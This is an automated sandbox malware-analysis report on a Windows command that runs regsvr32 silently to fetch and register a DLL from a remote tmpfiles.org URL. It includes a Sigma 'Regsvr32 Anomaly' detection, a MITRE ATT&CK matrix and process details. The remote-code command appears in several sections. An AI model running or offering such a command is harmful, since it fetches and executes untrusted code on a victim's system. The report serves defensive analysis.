ID: 357160
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 08:59:48
Date: 24/02/2021
Version: 31.0.0 Emerald

Table of Contents

Table of Contents (page 2)
Analysis Report (page 3)
  Overview (page 3)
    General Information (page 3)
    Detection (page 3)
    Signatures (page 3)
    Classification (page 3)
  Startup (page 3)
  Malware Configuration (page 3)
  Yara Overview (page 3)
  Sigma Overview (page 3)
    System Summary: (page 3)
  Signature Overview (page 3)
    System Summary: (page 4)
  Mitre Att&ck Matrix (page 4)
  Behavior Graph (page 4)
  Screenshots (page 5)
    Thumbnails (page 5)
  Antivirus, Machine Learning and Genetic Malware Detection (page 6)
    Initial Sample (page 6)
    Dropped Files (page 6)
    Unpacked PE Files (page 6)
    Domains (page 6)
    URLs (page 6)
  Domains and IPs (page 6)
    Contacted Domains (page 7)
    URLs from Memory and Binaries (page 7)
    Contacted IPs (page 7)
  General Information (page 7)
  Simulations (page 7)
    Behavior and APIs (page 8)
  Joe Sandbox View / Context (page 8)
    IPs (page 8)
    Domains (page 8)
    ASN (page 8)
    JA3 Fingerprints (page 8)
    Dropped Files (page 8)
  Created / dropped Files (page 8)
  Static File Info (page 8)
    No static file info (page 8)
  Network Behavior (page 8)
  Code Manipulations (page 8)
  Statistics (page 8)
  Behavior (page 8)
    System Behavior (page 9)
      Analysis Process: cmd.exe PID: 6988 Parent PID: 5036 (page 9)
        General (page 9)
        File Activities (page 9)
      Analysis Process: conhost.exe PID: 7008 Parent PID: 6988 (page 9)
        General (page 9)
      Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988 (page 10)
        General (page 10)
  Disassembly (page 10)
    Code Analysis (page 10)

Copyright null 2021 Page 2 of 10

Analysis Report

Overview

General Information

Analysis ID: 357160
Infos:
Most interesting Screenshot:

Detection

Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode…
Program does not show much activity…
Registers a DLL
Tries to load missing DLLs

Classification

[Classification chart: categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; legend: malicious, suspicious, clean]

Startup

System is w10x64

cmd.exe (PID: 6988 cmdline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll' MD5: F3BDBE3BB6F734E357235F4D5898582D)
  conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  regsvr32.exe (PID: 7056 cmdline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly

Signature Overview

• Networking
• System Summary
• Data Obfuscation
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Protection Evasion

System Summary:

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; ()
Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Process Injection 1 1; DLL Side-Loading 1; Logon Script (Windows)
Defense Evasion: Regsvr32 1; Process Injection 1 1; DLL Side-Loading 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account
Discovery: Security Software Discovery 1; System Information Discovery 1; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Data Obfuscation; Junk Data; Steganography
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

[Behavior graph. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, C# or VB.NET, C, C++ or other language, Is malicious, Internet]

ID: 357160
Cookbook: defaultwindowscmdlinecookbook.jbs
Startdate: 24/02/2021
Architecture: WINDOWS
Score: 22

Graph nodes: cmd.exe started conhost.exe; cmd.exe started regsvr32.exe
Signature node: Sigma detected: Regsvr32 Anomaly

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://tmpfiles.org/dl/161971/k.dllWinsta0 | regsvr32.exe, 00000002.00000002.325527375.00000000027F0000.00000004.00000020.sdmp | false | | unknown
https://tmpfiles.org/dl/161971/k.dll | regsvr32.exe, 00000002.00000002.325634312.0000000002AB0000.00000004.00000040.sdmp | true | | unknown
https://tmpfiles.org/dl/161971/k.dllregsvr32 | regsvr32.exe, 00000002.00000002.325527375.00000000027F0000.00000004.00000020.sdmp | false | | unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 357160
Start date: 24.02.2021
Start time: 08:59:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 53s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: SUS
Classification: sus22.win@4/0@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments:
  Adjust boot time
  Enable AMSI
  Stop behavior analysis, all processes terminated
Warnings:
  Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

• cmd.exe
• conhost.exe
• regsvr32.exe

System Behavior

Analysis Process: cmd.exe PID: 6988 Parent PID: 5036

General

Start time: 09:00:35
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source | File Path | Access | Attributes | Options | Completion | Count | Address | Symbol

Analysis Process: conhost.exe PID: 7008 Parent PID: 6988

General

Start time: 09:00:36
Start date: 24/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988

General

Start time: 09:00:36
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll
Imagebase: 0x100000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
